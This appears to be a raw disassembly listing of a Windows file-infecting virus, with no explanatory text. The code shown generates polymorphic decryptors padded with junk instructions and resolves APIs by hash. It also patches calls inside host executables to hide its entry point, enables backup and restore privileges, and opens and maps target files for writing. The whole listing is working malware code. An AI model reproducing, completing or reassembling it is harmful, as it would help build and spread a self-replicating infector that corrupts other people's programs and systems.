loc_47F564: ; CODE XREF: sub_47F51B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_47F561
loc_47F575: ; CODE XREF: sub_47F51B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_47F638
cmp word ptr [eax-2], 3233h
jnz loc_47F638
push esi
cmp dword ptr [edx], 0
jnz short loc_47F598
mov ecx, [edx+10h]
jmp short loc_47F59A
; ---------------------------------------------------------------------------
loc_47F598: ; CODE XREF: sub_47F51B+76�j
mov ecx, [edx]
loc_47F59A: ; CODE XREF: sub_47F51B+7B�j
add esi, ecx
push ecx
call sub_47F414
add esi, [ebp+1042F8h]
loc_47F5A8: ; CODE XREF: sub_47F51B+90�j
; sub_47F51B+117�j
lodsd
test eax, eax
js short loc_47F5A8
jz loc_47F637
push dword ptr [ebp+1042F8h]
push eax
call sub_47F414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_47F5D4: ; CODE XREF: sub_47F51B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_47F5EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_47F5D4
; ---------------------------------------------------------------------------
loc_47F5EB: ; CODE XREF: sub_47F51B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_47F631
cmp ebx, 0DB6E45A8h
jz short loc_47F631
cmp ebx, 0FFA13B59h
jz short loc_47F631
cmp ebx, 0ACB522D6h
jz short loc_47F631
cmp ebx, 0F358E993h
jz short loc_47F631
cmp ebx, 0F358E97Dh
jz short loc_47F631
cmp ebx, 0E1253F46h
jz short loc_47F631
cmp ebx, 0E1253F30h
jz short loc_47F631
call dword ptr [ebp+1042D4h]
loc_47F631: ; CODE XREF: sub_47F51B+D6�j
; sub_47F51B+DE�j ...
pop ebx
jmp loc_47F5A8
; ---------------------------------------------------------------------------
loc_47F637: ; CODE XREF: sub_47F51B+92�j
pop esi
loc_47F638: ; CODE XREF: sub_47F51B+60�j
; sub_47F51B+6C�j
add edx, 14h
jmp loc_47F52F
; ---------------------------------------------------------------------------
locret_47F640: ; CODE XREF: sub_47F51B+18�j
; sub_47F51B+22�j
retn
sub_47F51B endp
; ---------------------------------------------------------------------------
align 2
dw 46Ah
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_47F6D6
or ax, 2589h
jmp short loc_47F6E9
; ---------------------------------------------------------------------------
loc_47F6D6: ; CODE XREF: fuck:0047F6CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_47F6E5
or ax, 2531h
jmp short loc_47F6E9
; ---------------------------------------------------------------------------
loc_47F6E5: ; CODE XREF: fuck:0047F6DD�j
or ax, 2501h
loc_47F6E9: ; CODE XREF: fuck:0047F6D4�j
; fuck:0047F6E3�j
stosw
call near ptr dword_47F644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_47F6FB proc near ; CODE XREF: fuck:0047FD47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_47F644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_47F723
rdtsc
jmp short loc_47F725
; ---------------------------------------------------------------------------
loc_47F723: ; CODE XREF: sub_47F6FB+22�j
sub eax, eax
loc_47F725: ; CODE XREF: sub_47F6FB+26�j
stosd
retn
sub_47F6FB endp
; =============== S U B R O U T I N E =======================================
sub_47F727 proc near ; CODE XREF: fuck:loc_47FD51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_47F75A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_47F76C
; ---------------------------------------------------------------------------
loc_47F75A: ; CODE XREF: sub_47F727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_47F76C: ; CODE XREF: sub_47F727+31�j
retn
sub_47F727 endp
; =============== S U B R O U T I N E =======================================
sub_47F76D proc near ; CODE XREF: sub_47F7DF:loc_47F806�p
; sub_47F7DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_47F79B
; ---------------------------------------------------------------------------
loc_47F776: ; CODE XREF: sub_47F76D+44�j
mov al, 0FCh
jmp short loc_47F79A
; ---------------------------------------------------------------------------
loc_47F77A: ; CODE XREF: sub_47F76D+48�j
mov ax, 0EBh
stosw
jmp short loc_47F79B
; ---------------------------------------------------------------------------
loc_47F782: ; CODE XREF: sub_47F76D+4C�j
push 4
pop eax
call near ptr dword_47EB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_47F79B
; ---------------------------------------------------------------------------
loc_47F798: ; CODE XREF: sub_47F76D+50�j
mov al, 90h
loc_47F79A: ; CODE XREF: sub_47F76D+B�j
; sub_47F76D+60�j ...
stosb
loc_47F79B: ; CODE XREF: sub_47F76D+7�j
; sub_47F76D+13�j ...
push 1Bh
pop eax
call near ptr dword_47EB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_47F7DE
test dl, dl
jz short loc_47F776
dec dl
jz short loc_47F77A
dec dl
jz short loc_47F782
dec dl
jz short loc_47F798
dec dl
jz short loc_47F7CF
dec dl
jz short loc_47F7D6
dec dl
jz short loc_47F7DA
mov al, 0F9h
jmp short loc_47F79A
; ---------------------------------------------------------------------------
loc_47F7CF: ; CODE XREF: sub_47F76D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_47F79A
; ---------------------------------------------------------------------------
loc_47F7D6: ; CODE XREF: sub_47F76D+58�j
mov al, 0F5h
jmp short loc_47F79A
; ---------------------------------------------------------------------------
loc_47F7DA: ; CODE XREF: sub_47F76D+5C�j
mov al, 0F8h
jmp short loc_47F79A
; ---------------------------------------------------------------------------
locret_47F7DE: ; CODE XREF: sub_47F76D+40�j
retn
sub_47F76D endp
; =============== S U B R O U T I N E =======================================
sub_47F7DF proc near ; CODE XREF: fuck:loc_47FC28�p
; fuck:0047FDDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_47F7EF
add al, 4
loc_47F7EF: ; CODE XREF: sub_47F7DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_47F806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_47F806: ; CODE XREF: sub_47F7DF+1E�j
call sub_47F76D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_47F81D
mov ah, 29h
loc_47F81D: ; CODE XREF: sub_47F7DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_47F76D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_47F840
mov al, 86h
loc_47F840: ; CODE XREF: sub_47F7DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_47F854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_47F854: ; CODE XREF: sub_47F7DF+6C�j
retn
sub_47F7DF endp
; ---------------------------------------------------------------------------
loc_47F855: ; CODE XREF: sub_48045B+183�p
lea edi, [ebp+1039CCh]
call sub_47F76D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_47F86F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_47F86F db 0F7h ; ; CODE XREF: fuck:0047F86A�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_47FB00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_47FB00: ; CODE XREF: fuck:0047FAF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_47FB17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_47FB54
; ---------------------------------------------------------------------------
loc_47FB17: ; CODE XREF: fuck:0047FB0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_47FB29
mov al, 29h
loc_47FB29: ; CODE XREF: fuck:0047FB25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_47FB4C
mov ah, 0C8h
loc_47FB4C: ; CODE XREF: fuck:0047FB48�j
or ah, [ebp+1039B9h]
stosw
loc_47FB54: ; CODE XREF: fuck:0047FB15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_47FBDD
call sub_47F76D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_47FB88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_47FBD5
; ---------------------------------------------------------------------------
loc_47FB88: ; CODE XREF: fuck:0047FB7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_47FBA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_47FBBA
; ---------------------------------------------------------------------------
loc_47FBA5: ; CODE XREF: fuck:0047FB92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_47FBBA: ; CODE XREF: fuck:0047FBA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_47FBCD
add ah, 8
loc_47FBCD: ; CODE XREF: fuck:0047FBC8�j
or ah, [ebp+1039BAh]
stosw
loc_47FBD5: ; CODE XREF: fuck:0047FB86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_47FBDD: ; CODE XREF: fuck:0047FB6A�j
call sub_47F76D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_47FBFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_47F76D
loc_47FBFC: ; CODE XREF: fuck:0047FBEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_47FC28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_47FC2D
; ---------------------------------------------------------------------------
loc_47FC28: ; CODE XREF: fuck:0047FC0F�j
call sub_47F7DF
loc_47FC2D: ; CODE XREF: fuck:0047FC26�j
call sub_47F76D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_47FC49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_47FC58
; ---------------------------------------------------------------------------
loc_47FC49: ; CODE XREF: fuck:0047FC3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_47FC58: ; CODE XREF: fuck:0047FC47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_47FC93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_47FC8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_47FC92
; ---------------------------------------------------------------------------
loc_47FC8A: ; CODE XREF: fuck:0047FC6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_47FC92: ; CODE XREF: fuck:0047FC88�j
stosb
loc_47FC93: ; CODE XREF: fuck:0047FC62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_47FCAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_47FCB7
; ---------------------------------------------------------------------------
loc_47FCAF: ; CODE XREF: fuck:0047FC9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_47FCB7: ; CODE XREF: fuck:0047FCAD�j
stosb
call sub_47F76D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_47FCF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_47FD0B
mov cl, 77h
jmp short loc_47FD0B
; ---------------------------------------------------------------------------
loc_47FCF0: ; CODE XREF: fuck:0047FCC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_47FD0B: ; CODE XREF: fuck:0047FCEA�j
; fuck:0047FCEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_47F76D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_47FD5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_47FD5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_47FD51
call sub_47F6FB
call sub_47F76D
loc_47FD51: ; CODE XREF: fuck:0047FD45�j
call sub_47F727
call sub_47F76D
loc_47FD5B: ; CODE XREF: fuck:0047FD2D�j
; fuck:0047FD39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_47FD6F
mov al, 0C9h
stosb
call sub_47F76D
loc_47FD6F: ; CODE XREF: fuck:0047FD65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_47FDA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_47F76D
mov al, 61h
stosb
call sub_47F76D
loc_47FDA5: ; CODE XREF: fuck:0047FD79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_47F76D
test dword ptr [ebp+1039C0h], 20h
jz short loc_47FE31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_47FDED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_47F7DF
call sub_47F76D
mov al, 0C3h
stosb
call sub_47F76D
loc_47FDED: ; CODE XREF: fuck:0047FDCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_47F76D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_47FE20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_47FE2A
; ---------------------------------------------------------------------------
loc_47FE20: ; CODE XREF: fuck:0047FE12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_47FE2A: ; CODE XREF: fuck:0047FE1E�j
stosw
call sub_47F76D
loc_47FE31: ; CODE XREF: fuck:0047FDC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_47FE9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_47FE66
lea eax, [ebp+1039B8h]
loc_47FE5E: ; CODE XREF: fuck:0047FE64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_47FE5E
loc_47FE66: ; CODE XREF: fuck:0047FE56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_47FE7B
mov ax, 0C031h
stosw
loc_47FE7B: ; CODE XREF: fuck:0047FE73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_47FE94
mov ax, 0C031h
stosw
loc_47FE94: ; CODE XREF: fuck:0047FE8C�j
mov al, 0C3h
stosb
call sub_47F76D
loc_47FE9C: ; CODE XREF: fuck:0047FE3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_47FEB4
push edi
sub edi, eax
pop eax
jmp short loc_47FECD
; ---------------------------------------------------------------------------
loc_47FEB4: ; CODE XREF: fuck:0047FEAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_47FECD: ; CODE XREF: fuck:0047FEB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_47FEED
neg eax
loc_47FEED: ; CODE XREF: fuck:0047FEE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_47FEF1 proc near ; CODE XREF: sub_48045B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_4800D9
call near ptr loc_47FF11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_47FF11: ; CODE XREF: sub_47FEF1+F�p
add bh, bh
sub_47FEF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_47F414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_47F414
mov edi, [ebp+1042F4h]
push esi
call sub_47F414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4800D9
jz loc_4800D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_4800AA
loc_47FF8B: ; CODE XREF: sub_4800AA+29�j
lodsb
cmp al, 0E8h
jnz loc_480036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_47F414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_47FFB9
cmp eax, [edi+0Ch]
jnb loc_4800D2
jmp short loc_47FFC5
; ---------------------------------------------------------------------------
loc_47FFB9: ; CODE XREF: sub_4800AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_4800D2
loc_47FFC5: ; CODE XREF: sub_4800AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4800D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_47F414
cmp [ebp+1042F4h], edi
jnz loc_4800D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4800D2
cmp eax, [edi+8]
jnb loc_4800D2
loc_48000E: ; CODE XREF: sub_4800AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4800E8
jmp loc_4800D2
; ---------------------------------------------------------------------------
loc_480036: ; CODE XREF: sub_4800AA-11C�j
cmp al, 0FFh
jnz loc_4800D2
cmp byte ptr [esi], 15h
jnz loc_4800D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_47F414
cmp [ebp+1042F4h], edi
jnz short loc_4800D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_48007F
cmp eax, [ebp+10431Ch]
jb short loc_4800E8
loc_48007F: ; CODE XREF: sub_4800AA-35�j
cmp eax, 70000000h
jb short loc_4800BD
call sub_4800AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_4800A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4800C4
; ---------------------------------------------------------------------------
locret_4800A9: ; CODE XREF: sub_4800AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_4800AA
; =============== S U B R O U T I N E =======================================
sub_4800AA proc near ; CODE XREF: sub_4800AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0047FF8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_47F51B
popa
loc_4800BD: ; CODE XREF: sub_4800AA-26�j
test eax, 80000000h
jnz short loc_4800D2
loc_4800C4: ; CODE XREF: sub_4800AA-3�j
sub eax, [edi+0Ch]
jb short loc_4800D2
cmp eax, [edi+8]
jb loc_48000E
loc_4800D2: ; CODE XREF: sub_4800AA-F9�j
; sub_4800AA-EB�j ...
dec ecx
jnz loc_47FF8B
loc_4800D9: ; CODE XREF: sub_47FEF1+9�j
; fuck:0047FF73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_48012A
; ---------------------------------------------------------------------------
loc_4800E8: ; CODE XREF: sub_4800AA-7F�j
; sub_4800AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_48012A: ; CODE XREF: sub_4800AA+3C�j
pop edi
pop esi
retn
sub_4800AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48012D proc near ; CODE XREF: fuck:0048042E�p
; FUNCTION CHUNK AT 00480257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_480257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_480257
call sub_47E5AF
call near ptr loc_480168+5
push ebx
db 65h
jz short near ptr unk_4801A6
imul ebp, [ebp+53h], 72756365h
loc_480168: ; CODE XREF: sub_48012D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_48012D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_48019C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_480203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_48019C: ; CODE XREF: fuck:0048017F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_4801A6 db 0 ; CODE XREF: sub_48012D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_480203: ; CODE XREF: fuck:0048018D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_48012D
loc_480257: ; CODE XREF: sub_48012D+A�j
; sub_48012D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_48012D
; =============== S U B R O U T I N E =======================================
sub_480259 proc near ; CODE XREF: fuck:00480427�p
; fuck:00480433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_48032A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_48032A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_4808AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_48089F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_48089F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_48089F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
